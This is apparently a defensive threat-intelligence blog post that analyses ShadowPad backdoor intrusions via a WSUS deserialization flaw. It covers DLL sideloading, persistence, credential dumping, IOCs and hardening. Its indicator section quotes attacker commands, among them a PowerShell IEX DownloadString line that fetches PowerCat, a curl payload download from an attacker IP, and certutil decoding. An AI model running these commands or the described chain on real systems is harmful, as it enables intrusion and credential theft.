ShadowPad Exploiting WSUS: How a Trusted Update Server Becomes a Silent Backdoor

Aegiron 11 mins0

Overview

ShadowPad is a long-standing, advanced backdoor designed for stealth, persistence, and full remote control of compromised environments. It is not opportunistic malware; it is purpose-built for long-term access and is typically deployed after attackers gain privileged entry into a network.

In the most recent activity observed through December, ShadowPad is being deployed following exploitation of a critical Windows Server Update Services (WSUS) vulnerability. WSUS is a particularly dangerous foothold because it runs with SYSTEM privileges and is trusted across the domain. Once compromised, it provides attackers with an ideal platform for credential theft, lateral movement, and long-term persistence without raising immediate suspicion.

Threat Classification

  • Malware Name: ShadowPad
  • Malware Family: Modular backdoor / remote access trojan
  • Design Goal: Stealth, persistence, modular expansion
  • Primary Objectives: Espionage, credential theft, environment control
  • Secondary Activity Observed: Ransomware deployment, data exfiltration
  • Targeted Environments: Large enterprises, government, telecom, industrial systems, critical infrastructure

ShadowPad is often part of a broader toolset rather than a standalone attack. It is commonly paired with credential theft utilities, lateral movement tooling, and custom loaders.

Initial Access and Exploited Vulnerability

Recent campaigns rely heavily on CVE-2025-59287, a remote code execution flaw in Windows Server Update Services caused by unsafe deserialization.

This vulnerability allows:

  • Unauthenticated access
  • Remote execution of arbitrary code
  • Execution context as NT AUTHORITY\SYSTEM

Attackers do not need stolen credentials or phishing emails. If WSUS is reachable or insufficiently segmented, exploitation can occur directly from the network.

Immediate Post-Exploitation Behavior

Once code execution is achieved, attackers move quickly to stabilize access:

  • WSUS services or the IIS worker process (w3wp.exe) spawn cmd.exe or powershell.exe
  • A lightweight interactive shell is established, commonly via PowerShell-based tools such as PowerCat
  • Attackers avoid custom droppers and instead use native utilities:
    • PowerShell WebClient (DownloadString)
    • curl for direct file retrieval
    • certutil -decode to reconstruct payloads from encoded data

This “living off the land” approach significantly reduces detection by traditional antivirus tools.

Payload Delivery and Loader Architecture

ShadowPad is delivered using a multi-component loader designed to evade static and behavioral detection.

Execution model:

  1. A legitimate or legitimate-looking executable is placed on disk
  2. A malicious DLL with an expected name is placed in the same directory
  3. When the executable is launched, Windows loads the malicious DLL via DLL search order hijacking
  4. The DLL reads a nearby .tmp file containing encrypted ShadowPad payload and configuration data
  5. The payload is decrypted and executed directly in memory

Observed artifact examples:

  • ETDCtrlHelper.exe – abused executable used to trigger DLL loading
  • ETDApix.dll – malicious sideloaded DLL
  • 0C137A80.tmp – encrypted ShadowPad payload container

After execution, the core backdoor rarely touches disk again, making forensic recovery difficult.

Persistence Mechanisms

ShadowPad supports multiple persistence methods and often uses more than one simultaneously:

  • Creation of Windows services with generic or system-like names
  • Scheduled tasks configured to run at startup or on intervals
  • Registry Run or RunOnce keys pointing to loader components
  • In some cases, persistence is re-established dynamically through memory injection if removed

Persistence mechanisms are usually subtle and designed to survive routine administrative cleanup.

Credential Theft and Privilege Abuse

Once established on a WSUS server, ShadowPad operators typically focus on credentials:

  • Dumping LSASS memory to obtain plaintext credentials and NTLM hashes
  • Harvesting cached credentials and service account passwords
  • Accessing token privileges available to SYSTEM
  • In domain environments, attempting NTDS extraction or replication abuse

Because WSUS servers often interact with domain resources, harvested credentials frequently include high-value administrative accounts.

Lateral Movement and Internal Expansion

After credentials are obtained, attackers expand their reach using legitimate protocols:

  • RDP for interactive access
  • SMB for remote execution and file transfer
  • WMI for command execution
  • Service creation on remote hosts

Movement appears legitimate in logs because attackers are using real credentials, not exploits.

Command and Control Communication

ShadowPad communicates with its operators using HTTP or HTTPS:

  • Traffic is encrypted and blends into normal web traffic
  • Beacon intervals and endpoints are configurable
  • POST requests are commonly used for command retrieval and data exfiltration

From a network perspective, the traffic often looks like benign outbound web traffic unless closely inspected.

End-to-End Attack Flow

A typical intrusion unfolds as follows:

  1. WSUS server is reachable or insufficiently segmented
  2. CVE-2025-59287 is exploited
  3. SYSTEM-level command execution is achieved
  4. PowerShell or PowerCat establishes a shell
  5. Loader files and payload are downloaded
  6. DLL sideloading executes ShadowPad in memory
  7. Persistence is established
  8. Credentials are harvested
  9. Lateral movement begins
  10. Domain-wide compromise, espionage, or ransomware follows

This progression can occur rapidly or over weeks, depending on attacker objectives.

Indicators of Compromise (IOCs)

Process and Command Indicators

  • w3wp.exe or WSUS services spawning cmd.exe or powershell.exe
  • PowerShell one-liners using IEX, DownloadString, or encoded commands
  • certutil -decode executed on servers

Command Patterns

  • certutil -decode <input> <output>
  • curl http://<ip>:<port>/<file>
  • PowerShell loading PowerCat: IEX (New-Object Net.WebClient).DownloadString('https[:]//raw.githubusercontent.com/.../powercat.ps1')

File Indicators

  • Paired EXE and DLL files in the same directory
  • .tmp files created shortly before execution
  • Unsigned DLLs loaded by signed executables

Network Indicators

  • Outbound connections from WSUS servers to unknown IPs
  • Examples observed:
    • 149.28.78.189[:]42306
    • 163.61.102.245[:]443
  • HTTP POST traffic from servers that normally only contact Microsoft update services

Persistence Indicators

  • Newly created services with non-descriptive names
  • Scheduled tasks created outside maintenance windows
  • Registry run keys referencing uncommon paths

Detection Strategy

High-confidence detections:

  • WSUS or IIS processes launching PowerShell or CMD
  • Use of certutil to decode files on servers
  • DLLs loading from writable directories
  • Unexpected outbound internet access from WSUS

Supporting detections:

  • LSASS access attempts
  • RDP/SMB activity originating from WSUS
  • Obfuscated PowerShell execution

Prevention and Hardening

  • Patch WSUS immediately to remediate CVE-2025-59287
  • Restrict access to WSUS ports (8530/8531)
  • Isolate WSUS from user and internet-facing networks
  • Enforce MFA for all administrative accounts
  • Restrict outbound internet access from servers
  • Monitor and constrain PowerShell usage
  • Deploy EDR detections for DLL sideloading
  • Rotate credentials used on WSUS systems

Incident Response Considerations

If ShadowPad activity is suspected:

  1. Isolate the WSUS server immediately
  2. Preserve memory and logs before rebooting
  3. Assume credentials used on the server are compromised
  4. Hunt for lateral movement across the environment
  5. Remove persistence only after investigation
  6. Reset privileged credentials
  7. Escalate to full incident response if domain access is confirmed

MITRE ATT&CK Alignment

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: PowerShell (T1059.001)
  • Persistence: DLL Search Order Hijacking (T1574.001), Services (T1543), Scheduled Tasks (T1053)
  • Credential Access: OS Credential Dumping (T1003)
  • Lateral Movement: Remote Services (T1021)
  • Command and Control: Web Protocols (T1071.001)

Final Takeaway

ShadowPad activity leveraging WSUS compromises represents a high-impact threat due to the trust and privilege associated with update infrastructure. Once attackers gain a foothold, they can remain undetected for extended periods while quietly expanding access. Organizations should treat WSUS compromise as a potential domain-wide incident and respond accordingly.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.